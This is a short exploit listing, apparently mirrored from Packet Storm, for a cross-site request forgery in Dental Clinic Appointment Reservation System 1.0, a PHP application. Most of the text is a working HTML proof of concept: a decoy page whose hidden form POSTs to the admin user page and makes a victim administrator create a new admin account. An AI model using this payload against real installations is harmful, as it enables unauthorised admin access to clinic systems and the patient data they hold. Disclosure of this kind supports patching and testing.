Share
## https://sploitus.com/exploit?id=PACKETSTORM:162595
# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Cross Site Request Forgery (Add Admin)  
# Date: 15-05-2021  
# Exploit Author: Reza Afsahi  
# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code  
# Version: 1.0  
# Tested on: PHP 7.4.11 , Linux x64_x86  
  
  
# --- Proof of concept --- #  
  
# Vulnerable file : http://localhost/APR/admin/user.php  
  
# Exploit:  
  
<html>  
<head>  
<title>Add Admin</title>  
</head>  
<body>  
<h1> Absolutely Not Vulnerable Site :D </h1>  
<form method="POST" action="http://127.0.0.1/APR/admin/user.php">  
<input type="hidden" name="username" value="lol">  
<input type="hidden" name="password" value="321" >  
<button type="submit" name="submit">Click</button>  
</form>  
</body>  
</html>